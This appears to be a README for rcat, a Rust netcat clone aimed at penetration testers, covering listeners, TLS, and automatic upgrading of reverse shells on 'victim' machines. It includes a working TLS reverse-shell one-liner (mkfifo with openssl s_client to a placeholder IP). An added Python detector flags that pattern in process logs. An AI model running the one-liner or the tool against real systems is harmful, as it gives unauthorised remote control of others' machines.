Rcat is a modern netcat written in Rust, packed with features for hackers.
Here we listen on port `tcp:9001`, and receive an HTTP request made with `curl`.
We provide binaries for:
- Linux amd64
- Linux arm64
- Windows (amd64)
- Mac OS (arm64)
git clone [email protected]:0xfalafel/rcat.git
cargo install --path .
Rcat keeps a syntax similar to netcat. You already know how to use it.
- `-l` to listen.
- `-u` for udp.
Rcat can upgrade your shells with the `--pwn` option.
With an upgraded shell, you can use shortcuts like `Ctrl + C`, clear the terminal with `clear` or `Ctrl + L`, etc. It's like having an SSH connection.
There is no need to type 7 commands each time you obtain a reverse shell.
Here the commands `stty rows 22 cols 65` and `export TERM=xterm-256colors` are typed automatically when the connection is received.
Windows is also supported by the shell upgrade feature.
Unless you use the `-R` option, the remote terminal will automatically be resized when you change the size of your terminal.
(Rcat sends a SIGTSTP, resizes the terminal with the `stty` command, then uses `fg` to restore the running application.)
In this clip we run `htop` on the victim machine, and the reverse shell is automatically resized.
Support of TLS with `-t` or `--tls`.
Here we do an HTTPS request. We use `-t` to establish a TLS connection, and `-c` to replace newlines (`\n`) with CRLF newlines (`\r\n`) as required by the HTTP protocol.
With TLS support, let's see how we can do a TLS-encrypted reverse shell, without installing any new tools on the victim.
If you have a signed certificate (with Let's Encrypt for example), you can use the `--key` and `--cert` options to use it.
But for now let's use a self-signed certificate:
> rcat -l 1337 --self-signed
Listening on 0.0.0.0:1337 (tcp/tls) with a self-signed certificate
On a Linux target, you can use the following command to connect to your listener.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1| openssl s_client -connect YOUR_IP:1337 >/tmp/f
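
On the defensive side, the FIFO-plus-`openssl s_client` pattern above can be flagged in process command-line telemetry. The Python below is an added example, not part of rcat; the record layout (`timestamp host user cmdline`), the function names and the sample lines are constructed for illustration, and it assumes the whole pipeline appears in a single record (as when it is launched through `sh -c`).

```python
import re

# Parts of the one-liner, matched independently so that reordering or
# extra whitespace does not defeat the check.
MKFIFO = re.compile(r"\bmkfifo\s+(?P<fifo>[^\s;&|]+)")
INTERACTIVE_SHELL = re.compile(r"\b(?:sh|bash|dash|zsh)\s+-i\b")
S_CLIENT = re.compile(r"\bopenssl\s+s_client\b.*?-connect\s+(?P<peer>[^\s;|>]+)")

# Constructed sample records: "timestamp host user cmdline".
SAMPLE_LOG = [
    "2024-05-01T10:00:03Z web01 deploy openssl s_client -connect example.com:443 -servername example.com",
    "2024-05-01T10:01:47Z web01 app mkfifo /run/app.pipe; cat /run/app.pipe | logger -t app",
    "2024-05-01T10:02:11Z web01 www-data sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1| openssl s_client -connect 192.0.2.10:1337 >/tmp/f",
]


def classify(cmdline):
    """Return a finding if cmdline wires an interactive shell to openssl s_client through a FIFO."""
    fifo = MKFIFO.search(cmdline)
    tls = S_CLIENT.search(cmdline)
    if not (fifo and tls and INTERACTIVE_SHELL.search(cmdline)):
        return None
    path = re.escape(fifo.group("fifo")) + r"(?![\w./-])"
    # The loop is closed when the same FIFO is both read from and written to.
    reads = re.search(r"(?:\bcat\s+|<\s*)" + path, cmdline) is not None
    writes = re.search(r">\s*" + path, cmdline) is not None
    return {"fifo": fifo.group("fifo"), "peer": tls.group("peer"), "loop_closed": reads and writes}


def scan(lines):
    """Classify every record and return the flagged ones with their context."""
    findings = []
    for line in lines:
        ts, host, user, cmdline = line.split(" ", 3)
        hit = classify(cmdline)
        if hit:
            findings.append({"time": ts, "host": host, "user": user, **hit})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The ordinary `openssl s_client` certificate check and the benign `mkfifo` logging pipeline in the sample are not flagged, because the rule requires all three parts in the same command line.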